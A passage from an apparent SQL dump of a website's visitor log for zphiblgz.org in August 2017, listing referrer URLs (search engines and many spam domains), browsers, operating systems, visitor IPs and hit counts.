9.143.34.19','000',1,0),(8872,'2017-08-11','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1510.e6qO1R3-OyUJliLWM99j4FCxEq-KGwr0gJpHO55tqccuJainpwOWKxGtGbcGGeiq.32a1ad5148c7d7ad60c89915c093500a8b85fc09&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YLeQVNu7TCjFWhspMNrg36Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSS1zUE1TOUU5TVVjbXhKM2hyR0lVQ3AzTklHdHUxMFlWVWxUZ3ZneGViVlQweUREaXdPN0Jq&b64e=2&sign=d5b3622ac68b29d2a6a4e160e6b0da6d&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7Jarr06Bws-xicr_XGRFT0cjRZdKjP-OwmZwvrrmzRRPkPEYBtDl0vvb6nZras9sv0gjqT-02IyE4OdRnJMufd1D3ZBqh3cAIxU6Xsi0_Dil2Jp_eTkfbu1UFZD4-XoX2l72O&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWQWxj6qvocP1WE4z84Q49Bov-T-q4ynZ34VqJ9hML7Myzd2GyqCnUJi8pJOcsJH7qCb-wDrzteyg&l10n=ru&cts=1502483604442&mc=2.75745274188','Firefox','Windows','53.0','','109.63.211.184','000',1,0),(8873,'2017-08-11','http://zphiblgz.org/','Firefox','Windows','52.0','','178.137.83.166','000',2,0),(8874,'2017-08-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.67','000',2,0),(8875,'2017-08-11','http://zphiblgz.org','Firefox','Windows','40.1','','188.70.19.128','000',2,0),(8876,'2017-08-11','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1510.n7nHosW8XFTAWucGyxIjFqZFVBK4gygYef2ynkw7masvJg-mCnLwSLFQws6xu9LT.8dec2afc1c3c526a119da1e3734fda68dae6ddf8&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YL_nDC5hqtEQ6WayFoZKRZE&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSS1zUE1TOUU5TVVlcUlWMjdjUFBEdF94QVBXeFhFOWZNaDlJNUNtVHh1UE9SeE16dmVxUmli&b64e=2&sign=ef4ccb71747d5a8670da18f859271824&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96FgNLtxqlg5W-OOz-OdAfdH0FA0lQCcJD_mGPqzWm5_UuEfZB8EhGb-0Xr9qgAGxpUhYBgi1QPQzZ480xdRG_HZoWMKJ6gnVIVgiqcUhzcgwwNL_EMVBbBRQ&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWLmUMpz38pREtET0-Qnsb48Aimwu3U91jOZqVkWQP4W7IfeUjnVdmr84bI2ZaPYl2-3FlD3KKrBA&l10n=ru&cts=1502488082076&mc=1.57928271539','Firefox','Windows','53.0','','128.69.148.63','000',1,0),(8877,'2017-08-11','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','103.67.235.94','000',2,0),(8878,'2017-08-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.75','000',1,0),(8879,'2017-08-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.41.8','000',2,0),(8880,'2017-08-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','188.209.52.9','000',2,0),(8881,'2017-08-11','http://zphiblgz.org','Firefox','Windows','40.1','','113.172.107.225','000',1,0),(8882,'2017-08-11','http://zphiblgz.org','WWW-Mechanize','Unknown','1.73','','54.70.60.185','000',2,0),(8883,'2017-08-11','https://www.google.com/','Chrome','Android','51.0.2704.106','','66.87.115.58','000',7,0),(8884,'2017-08-11','http://zphiblgz.org','Firefox','Windows','40.1','','1.255.251.210','000',1,0),(8885,'2017-08-11','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','173.254.28.38','000',1,0),(8886,'2017-08-11','http://zphiblgz.org','Firefox','Windows','40.1','','186.137.238.67','000',1,0),(8887,'2017-08-11','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.204','000',1,0),(8888,'2017-08-11','http://zphiblgz.org/','Firefox','Windows','7.0.1','','46.165.223.217','000',1,0),(8889,'2017-08-11','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.76','000',1,0),(8890,'2017-08-11','http://zphiblgz.org','Firefox','Windows','40.1','','167.58.117.22','000',2,0),(8891,'2017-08-11','http://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.45.183','000',1,0),(8892,'2017-08-11','http://hdwallpapers-free.com/','Opera','Windows','8.01','','178.137.4.41','000',1,0),(8893,'2017-08-12','http://zphiblgz.org','Chrome','Windows','59.0.3071.86','','192.198.80.227','000',1,0),(8894,'2017-08-12','http://stroyplus.ru/','MSIE','Windows','6.0','','188.163.79.53','000',5,0),(8895,'2017-08-12','http://zphiblgz.org','Firefox','Windows','40.1','','182.190.44.179','000',2,0),(8896,'2017-08-12','http://karaganda.xkaz.org/','MSIE','Windows','6.0','','46.118.154.36','000',3,0),(8897,'2017-08-12','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','162.144.201.32','000',2,0),(8898,'2017-08-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.170.41.8','000',2,0),(8899,'2017-08-12','http://zphiblgz.org','curl','Unknown','7.54.1','','95.211.38.161','000',1,0),(8900,'2017-08-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','64.137.162.142','000',2,0),(8901,'2017-08-12','https://www.google.com/','Chrome','Windows','59.0.3071.115','','196.54.55.19','000',1,0),(8902,'2017-08-12','http://zphiblgz.org/scholarship/','Firefox','Windows','44.0','','176.123.6.123','000',1,0),(8903,'2017-08-12','http://zphiblgz.org','Firefox','Windows','38.0','','176.123.6.123','000',1,0),(8904,'2017-08-12','http://zphiblgz.org','Firefox','Windows','40.1','','117.206.113.152','000',2,0),(8905,'2017-08-12','http://zphiblgz.org','Chrome','Windows','41.0.2224.3','','195.22.127.195','000',2,0),(8906,'2017-08-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','65.19.167.131','000',2,0),(8907,'2017-08-12','http://zphiblgz.org/wp-admin/post.php?post=1107&action=edit','Chrome','Chrome OS','55.0.2883.103','','69.143.34.19','000',6,0),(8908,'2017-08-12','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','65.60.2.250','000',1,0),(8909,'2017-08-12','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1511.t5jVU57uRKQmHK5uuwrHuI_jTx2yFOlFJmr9CL4LLxcqcNhKb1np-lMIehm9LR1C.3dea6643f5174a3510a54fac65c7e86a2a46077d&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSS1zUE1TOUU5TVVTcUVmeGd5SlhDQlhoY2psWHBBQVNHdjNadEtCZV9mbm9aOTBuNHVQaG9K&b64e=2&sign=7cac8d87bc6cea739e60de4682c4a063&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQXbYQp9t5VF656_1Qehj7Mmm7Z7_7XAWnTWwvLryGGMlO7V9V93M30HO5EjvKQpiPk9T1WnUhjpKnmWrXD-t7gHeU-bN05e16-DNdNOsgoo4LTntJ1qDD0aGyyF4zUoGjg&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCV2hwMtfL3ozJvxknQ8n57AN7IuTm5BXJBD9h8ExSgYcdREyihYqI1f8J7enVacLv2wv1FQgQ0YFA&l10n=ru&cts=1502544340049&mc=5.55659006012','Firefox','Windows','53.0','','188.255.16.233','000',1,0),(8910,'2017-08-12','http://zphiblgz.org','MSIE','Windows','6.0','','81.177.3.147','000',1,0),(8911,'2017-08-12','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(8912,'2017-08-12','http://zphiblgz.org','Firefox','Windows','40.1','','188.223.132.115','000',2,0),(8913,'2017-08-12','http://zphiblgz.org','Chrome','Macintosh','59.0.3071.115','','192.198.80.227','000',1,0),(8914,'2017-08-12','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','54.218.94.28','000',2,0),(8915,'2017-08-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.165','000',2,0),(8916,'2017-08-12','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','149.210.170.147','000',2,0),(8917,'2017-08-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.201','000',2,0),(8918,'2017-08-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','209.123.234.23','000',2,0),(8919,'2017-08-12','http://cool-wedding.net/','MSIE','Windows','5.5','','46.118.125.246','000',7,0),(8920,'2017-08-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.27','000',2,0),(8921,'2017-08-12','http://zphiblgz.org','Firefox','Windows','40.1','','43.224.131.9','000',1,0),(8922,'2017-08-12','http://zphiblgz.org','Firefox','Windows','40.1','','203.160.182.90','000',1,0),(8923,'2017-08-12','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','192.145.239.32','000',1,0),(8924,'2017-08-12','http://www.z-master.ru/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(8925,'2017-08-12','https://www.google.com/','Chrome','Windows','60.0.3112.90','','184.152.63.217','000',1,0),(8926,'2017-08-12','https://woweb.com.ua/','MSIE','Windows','5.5','','46.118.118.100','000',2,0),(8927,'2017-08-12','https://educontest.net/','MSIE','Windows','4.01','','188.163.79.53','000',3,0),(8928,'2017-08-12','http://zphiblgz.org','Firefox','Linux','31.0','','37.187.56.66','000',2,0),(8929,'2017-08-12','https://mmostrike.ru/','MSIE','Windows','5.0','','46.118.118.100','000',2,0),(8930,'2017-08-12','http://zphiblgz.org','Firefox','Windows','40.1','','103.233.93.1','000',2,0),(8931,'2017-08-13','http://zphiblgz.org','Firefox','Windows','40.1','','190.92.43.86','000',2,0),(8932,'2017-08-13','http://zphiblgz.org','Chrome','Windows','49.0.2623.75','','138.197.111.31','000',1,0),(8933,'2017-08-13','https://i-hobot.ru/','Opera','Windows','8.01','','46.118.154.36','000',1,0),(8934,'2017-08-13','http://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.50','000',1,0),(8935,'2017-08-13','https://xn--80abgj3a5acid6ghs.top/','MSIE','Windows','6.0','','46.118.118.100','000',4,0),(8936,'2017-08-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.17.97.112','000',2,0),(8937,'2017-08-13','http://technika-remont.ru/','MSIE','Windows','6.0','','46.118.125.246','000',1,0),(8938,'2017-08-13','http://zphiblgz.org','MSIE','Windows','6.0','','188.65.211.238','000',1,0),(8939,'2017-08-13','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','178.20.153.60','000',2,0),(8940,'2017-08-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','37.220.35.202','000',2,0),(8941,'2017-08-13','https://www.facebook.com/businesses.center/','MSIE','Windows','6.0','','178.137.4.41','000',5,0),(8942,'2017-08-13','http://zphiblgz.org','MSIE','Windows','10.0','','5.9.112.6','000',1,0),(8943,'2017-08-13','http://zphiblgz.org','curl','Unknown','7.54.1','','5.61.44.59','000',1,0),(8944,'2017-08-13','http://zphiblgz.org','Firefox','Windows','40.1','','202.9.42.113','000',2,0),(8945,'2017-08-13','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.159.88','000',2,0),(8946,'2017-08-13','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.186.134','000',12,0),(8947,'2017-08-13','http://zphiblgz.org','Firefox','Windows','40.1','','58.69.19.157','000',1,0),(8948,'2017-08-13','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','217.160.63.12','000',1,0),(8949,'2017-08-13','https://www.mb140.ru/','MSIE','Windows','6.0','','188.163.79.53','000',5,0),(8950,'2017-08-13','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1512.R9K2iAc2cD-KVy08JMAO5sadLcdAU2x15sR8NY5Od54qPvUAf7cCC8mRzZ1NuQjn.7a35affe28effe562f1d71668d9f569e85de86f7&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YL_nDC5hqtEQ6WayFoZKRZE&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSS1zUE1TOUU5TVVYeDVnWHZxem1peVVDbWx5WWM2bGVjS25vTXNmTTVBXzQ4OFJyNk5xdW8t&b64e=2&sign=66c992e9b72da2209199645e89a42d8c&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQULnoVAFacUfVwH-C5b5cl9gnqy80ht-Ym2mhV377Ojoy8p6TYnFIhjXxDCaVUG-md2fhZ8dyEKqywSGlVqhltLuX2uCNwL5i_LmvGWObsuNfNfPINi7s70sdqg3Ry-hHEdDmI3MumAY&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCUeNiDU-Ul0A3GxruwBPLrxIxe8d-KSXRJ2RCNF-5fDoC1neYj0QYeTA0HRRkUO7iFDiSWoNN8v7w&l10n=ru&cts=1502643663030&mc=7.31308854969','Firefox','Windows','53.0','','46.42.167.60','000',1,0),(8951,'2017-08-13','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.217.246','000',55,0),(8952,'2017-08-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(8953,'2017-08-13','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',3,0),(8954,'2017-08-13','http://zphiblgz.org','Firefox','Windows','40.1','','41.158.225.137','000',2,0),(8955,'2017-08-13','http://zphiblgz.org/ts_teams/dawn-j-kemp/','Chrome','Windows','56.0.2924.87','','89.28.24.190','000',1,0),(8956,'2017-08-13','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.167.196','000',74,0),(8957,'2017-08-13','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','185.17.150.18','000',2,0),(8958,'2017-08-13','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.59.73','000',20,0),(8959,'2017-08-13','http://zphiblgz.org','Chrome','Windows','37.0.2049.0','','14.199.207.63','000',4,0),(8960,'2017-08-13','http://zphiblgz.org','Chrome','Linux','26.0.1410.63','','40.71.37.15','000',6,0),(8961,'2017-08-13','http://zphiblgz.org','ZoominfoBot','Unknown','Unknown','','104.196.183.13','000',24,0),(8962,'2017-08-13','http://zphiblgz.org','Firefox','Windows','40.1','','175.143.86.49','000',1,0),(8963,'2017-08-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(8964,'2017-08-13','http://zphiblgz.org','Firefox','Windows','40.1','','193.92.113.30','000',2,0),(8965,'2017-08-13','http://pavlodar.xkaz.org/','MSIE','Windows','6.0','','46.118.154.36','000',4,0),(8966,'2017-08-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',2,0),(8967,'2017-08-13','http://www.bing.com/search?q=zeta+laura+sanders+of+zeta+phi+beta&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=','MSIE','Windows','9.0','','204.79.180.16','000',1,0),(8968,'2017-08-13','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','144.76.120.42','000',1,0),(8969,'2017-08-13','http://zphiblgz.org','Firefox','Windows','40.1','','121.168.79.108','000',1,0),(8970,'2017-08-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.140.123','000',1,0),(8971,'2017-08-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.63.98','000',1,0),(8972,'2017-08-13','https://buydissertation.net/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(8973,'2017-08-13','http://zphiblgz.org','Firefox','Windows','21.0','','5.9.106.81','000',1,0),(8974,'2017-08-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.107.85.56','000',2,0),(8975,'2017-08-14','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','151.80.41.124','000',2,0),(8976,'2017-08-14','http://zphiblgz.org','Firefox','Linux','31.0','','37.187.56.66','000',62,0),(8977,'2017-08-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.202','000',1,0),(8978,'2017-08-14','http://zphiblgz.org/','Firefox','Windows','7.0.1','','23.129.64.12','000',1,0),(8979,'2017-08-14','http://zphiblgz.org','Firefox','Windows','40.1','','84.1.178.207','000',1,0),(8980,'2017-08-14','http://zphiblgz.org','MSIE','Windows','6.0','','46.17.42.76','000',2,0),(8981,'2017-08-14','http://zphiblgz.org','Firefox','Windows','40.1','','90.29.169.122','000',1,0),(8982,'2017-08-14','http://zphiblgz.org','Firefox','Windows','40.1','','2.126.103.6','000',1,0),(8983,'2017-08-14','http://zphiblgz.org','curl','Unknown','7.54.1','','95.211.38.161','000',3,0),(8984,'2017-08-14','http://zphiblgz.org','Opera','Windows','8.50','','107.152.244.43','000',2,0),(8985,'2017-08-14','http://zphiblgz.org','Firefox','Linux','54.0','','138.197.73.157','000',3,0),(8986,'2017-08-14','http://zphiblgz.org','Chrome','Windows','59.0.3071.115','','138.197.73.157','000',2,0),(8987,'2017-08-14','http://zphiblgz.org','Chrome','Windows','49.0.2623.75','','138.197.73.157','000',1,0),(8988,'2017-08-14','http://zphiblgz.org','Opera Next','Macintosh','46.0.2597.57','','138.197.73.157','000',1,0),(8989,'2017-08-14','http://zphiblgz.org','Chrome','Windows','60.0.3112.78','','138.197.73.157','000',2,0),(8990,'2017-08-14','http://zphiblgz.org','Firefox','Windows','40.1','','105.235.132.136','000',2,0),(8991,'2017-08-14','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1513.KLye0w0uOoYSRrP8FxoZ_9cS-n-fUhSN0AcT64OYC3q2-vrH38j6CX26hxg80w76.74beb6c96ecfd2a03af855c68adf949025fee1d7&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YKCJkrjchpDstTwxTkjwGrA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSS1zUE1TOUU5TVVRQkdxeTU4dk9hRDlIVG1nNzh2bmtsZ2FkMlozVE8tN3YxY0pxRlZGN1Vj&b64e=2&sign=28e32efb2dbb54b3abcb9e329c44778c&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4fzCp6a37Ph3Hy7_8GljEGKRiu4MCY7CrpmOvPC2ZYZO2aTVaf-Z07a77lBiMiKXdrA3_5FMP68Lyu7GgjpnqLmprdl042Rv0kOLpMAfiH2MpsiD8PFqTPgeoLsHhIC5U&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCX5No9jVno6g81xyeHqlMAg-SbZJzxs6pwssHHSCH97_y67SvY6n5BMf21uRSfTZ4Fp61ZxIx0WLQ&l10n=ru&cts=1502699498779&mc=5.44466677717','Firefox','Windows','53.0','','37.204.39.16','000',1,0),(8992,'2017-08-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','158.69.225.34','000',19,0),(8993,'2017-08-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(8994,'2017-08-14','http://zphiblgz.org','Chrome','Android','45.0.2454.94','','158.69.225.34','000',1,0),(8995,'2017-08-14','https://moetomnenie.com/','Unknown','Unknown','Unknown','','188.163.79.53','000',1,0),(8996,'2017-08-14','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','74.208.122.71','000',1,0),(8997,'2017-08-14','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1513.uZOIYQpTuWt6hCc7yHaGfrzPovdeuEHFy3dzB-qmTEBgtzfMfloMkNlIhOVYYg_5.586fdb16c5ad9d7863ce10ada5702b3e5d02dc0b&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSS1zUE1TOUU5TVVkdzJteHRJT1lGQWo0dndtMnNhWHFHZ19vY0ZZbmhoX0J6NmZoV2dYZ3ht&b64e=2&sign=70325953e06cd8eceb2fe68c6048f8bd&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4jyWgg5fBlslt9X9ZGfCUJkkop_OmlJ7eIlngMkKi2U-g_MuPRe6MZbGFn4nH_SEjg2VSBhsLk5d0zZfpTSL_fLUA_zLAoCZFsAqs605hDFE4j1ekGvT4dOzKKRfdn6sn&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVGd-5JIAsUxn8fwYKrLfb-pb6l32EJwZhia7zsWWTmWj1Puxhfl-Nd0nCfjUC6ghB202aeGa0V3g&l10n=ru&cts=1502709535860&mc=3.97189644729','MSIE','Windows','8.0','','128.74.244.73','000',1,0),(8998,'2017-08-14','https://www.google.com/','Chrome','Windows','60.0.3112.90','','23.31.193.133','000',5,0),(8999,'2017-08-14','http://zphiblgz.org/','Firefox','Windows','43.0','','193.201.225.139','000',1,0),(9000,'2017-08-14','http://life-instyle.com/eda.html','MSIE','Unknown','6.0','','46.118.125.246','000',3,0),(9001,'2017-08-14','https://www.google.com/','Chrome','Windows','60.0.3112.90','','98.218.204.30','000',1,0),(9002,'2017-08-14','http://zphiblgz.org/','Chrome','Windows','57.0.2987.110','','146.185.223.122','000',1,0),(9003,'2017-08-14','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.85','000',1,0),(9004,'2017-08-14','http://remontvsamare.su/','MSIE','Windows','6.0','','46.118.118.100','000',4,0),(9005,'2017-08-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','5.199.130.188','000',2,0),(9006,'2017-08-14','http://zphiblgz.org','MSIE','Windows','11.0','','62.210.245.197','000',1,0),(9007,'2017-08-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.67.116','000',2,0),(9008,'2017-08-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.205','000',1,0),(9009,'2017-08-14','http://zphiblgz.org/','Firefox','Windows','7.0.1','','65.19.167.131','000',1,0),(9010,'2017-08-14','https://mojaocena.com/','MSIE','Windows','6.0','','46.118.154.36','000',3,0),(9011,'2017-08-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.70.10.238','000',2,0),(9012,'2017-08-14','http://zphiblgz.org','Firefox','Windows','40.1','','110.44.0.66','000',1,0),(9013,'2017-08-14','http://zphiblgz.org','Firefox','Windows','40.1','','85.99.90.69','000',1,0),(9014,'2017-08-14','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','108.179.229.212','000',2,0),(9015,'2017-08-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.122.50','000',2,0),(9016,'2017-08-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.230.5','000',2,0),(9017,'2017-08-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','178.17.174.14','000',2,0),(9018,'2017-08-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',3,0),(9019,'2017-08-14','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',3,0),(9020,'2017-08-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','209.126.97.207','000',1,0),(9021,'2017-08-14','zphiblgz.org','Chrome','Windows','50.0.2661.75','','187.5.6.136','000',4,0),(9022,'2017-08-14','http://videochat.life/','Opera','Windows','9.00','','46.118.118.100','000',2,0),(9023,'2017-08-14','https://xn----dtbndd4ae7eub.top/','Opera','Windows','9.0','','46.118.118.100','000',3,0),(9024,'2017-08-14','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','69.167.175.211','000',1,0),(9025,'2017-08-14','https://buy-meds24.com/','Opera','Windows','7.60','','178.137.4.41','000',3,0),(9026,'2017-08-14','http://r.search.yahoo.com/_ylt=A0LEVxmBJJJZmuYAmlZx.9w4;_ylu=X3oDMTE0bGhyaDE4BGNvbG8DYmYxBHBvcwMxBHZ0aWQDVUkyRkJUM18xBHNlYwNzcg--/RV=2/RE=1502778626/RO=10/RU=http%3a%2f%2fzphiblgz.org%2f/RK=1/RS=diXiJqYPPglIPyLAk9o9eWU7Hrg-','Safari','iPhone','10.0','','174.226.13.188','000',1,0),(9027,'2017-08-14','http://zphiblgz.org','Firefox','Linux','29.0','','23.94.84.122','000',2,0),(9028,'2017-08-14','http://zphiblgz.org','Firefox','Windows','40.1','','177.96.239.213','000',1,0),(9029,'2017-08-14','http://zphiblgz.org','Chrome','Windows','60.0.3112.90','','100.36.64.108','000',1,0),(9030,'2017-08-14','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','185.49.14.244','000',2,0),(9031,'2017-08-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.126.252.12','000',1,0),(9032,'2017-08-14','http://pochtovyi-index.ru/','MSIE','Windows','6.0','','46.118.125.246','000',1,0),(9033,'2017-08-14','https://www.mb140.ru/','MSIE','Windows','6.0','','188.163.79.53','000',1,0),(9034,'2017-08-14','https://www.google.com/','Safari','iPhone','10.0','','68.97.98.37','000',1,0),(9035,'2017-08-14','http://podshipniki-ntn.ru/','MSIE','Unknown','6.0','','178.137.4.41','000',1,0),(9036,'2017-08-14','http://zphiblgz.org','Firefox','Windows','40.1','','46.167.198.10','000',1,0),(9037,'2017-08-14','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','179.43.171.226','000',3,0),(9038,'2017-08-14','zphiblgz.org','Chrome','Windows','50.0.2661.75','','91.205.173.48','000',4,0),(9039,'2017-08-15','zphiblgz.org','Chrome','Windows','50.0.2661.75','','91.205.173.48','000',4,0),(9040,'2017-08-15','http://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.65','000',1,0),(9041,'2017-08-15','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','185.2.4.92','000',1,0),(9042,'2017-08-15','http://zphiblgz.org','Firefox','Windows','40.1','','202.129.228.154','000',1,0),(9043,'2017-08-15','http://zphiblgz.org','Firefox','Windows','40.1','','175.158.216.53','000',2,0),(9044,'2017-08-15','http://zphiblgz.org','Safari','iPhone','6.0','','123.126.113.104','000',1,0),(9045,'2017-08-15','https://minharevisao.com/','Opera','Windows','6.0','','188.163.79.53','000',2,0),(9046,'2017-08-15','https://essayservicewriting.org/','MSIE','Windows','6.0','','134.249.80.194','000',3,0),(9047,'2017-08-15','http://zphiblgz.org','MSIE','Windows','6.0','','185.161.209.125','000',1,0),(9048,'2017-08-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','204.85.191.31','000',1,0),(9049,'2017-08-15','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.165.168.42','000',1,0),(9050,'2017-08-15','http://zphiblgz.org','Unknown','Unknown','Unknown','','212.129.9.202','000',1,0),(9051,'2017-08-15','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','93.157.100.40','000',2,0),(9052,'2017-08-15','http://ivanovo.zrus.org/','MSIE','Windows','3.02','','46.118.125.246','000',1,0),(9053,'2017-08-15','https://lechenie-gemorroya.com/','Unknown','Unknown','Unknown','','188.163.79.53','000',2,0),(9054,'2017-08-15','http://zphiblgz.org','Firefox','Windows','40.1','','78.180.237.248','000',1,0),(9055,'2017-08-15','http://zphiblgz.org','MSIE','Windows','7.0','','34.205.160.122','000',1,0),(9056,'2017-08-15','http://zphiblgz.org','MSIE','Windows','7.0','','34.194.2.110','000',1,0),(9057,'2017-08-15','http://zphiblgz.org','Firefox','Windows','40.1','','5.149.94.174','000',2,0),(9058,'2017-08-15','http://zphiblgz.org','Firefox','Windows','40.1','','103.76.58.2','000',1,0),(9059,'2017-08-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.139.161','000',1,0),(9060,'2017-08-15','https://www.google.com/','Chrome','Windows','60.0.3112.90','','23.31.193.133','000',3,0),(9061,'2017-08-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','193.90.12.90','000',1,0),(9062,'2017-08-15','http://zphiblgz.org/','Firefox','Windows','7.0.1','','216.218.222.11','000',1,0),(9063,'2017-08-15','http://zphiblgz.org','MSIE','Windows','6.0','','82.202.194.181','000',1,0),(9064,'2017-08-15','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','5.61.44.59','000',2,0),(9065,'2017-08-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','82.165.100.196','000',1,0),(9066,'2017-08-15','http://zphiblgz.org/','Firefox','Windows','7.0.1','','163.172.179.129','000',1,0),(9067,'2017-08-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','79.137.80.94','000',2,0),(9068,'2017-08-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.82.244','000',1,0),(9069,'2017-08-15','http://zphiblgz.org/','Firefox','Windows','7.0.1','','146.185.177.103','000',1,0),(9070,'2017-08-15','http://pavlodar.xkaz.org/','Opera','Windows','7.02','','46.118.154.36','000',2,0),(9071,'2017-08-15','http://zphiblgz.org','Chrome','Windows','54.0.2840.71','','21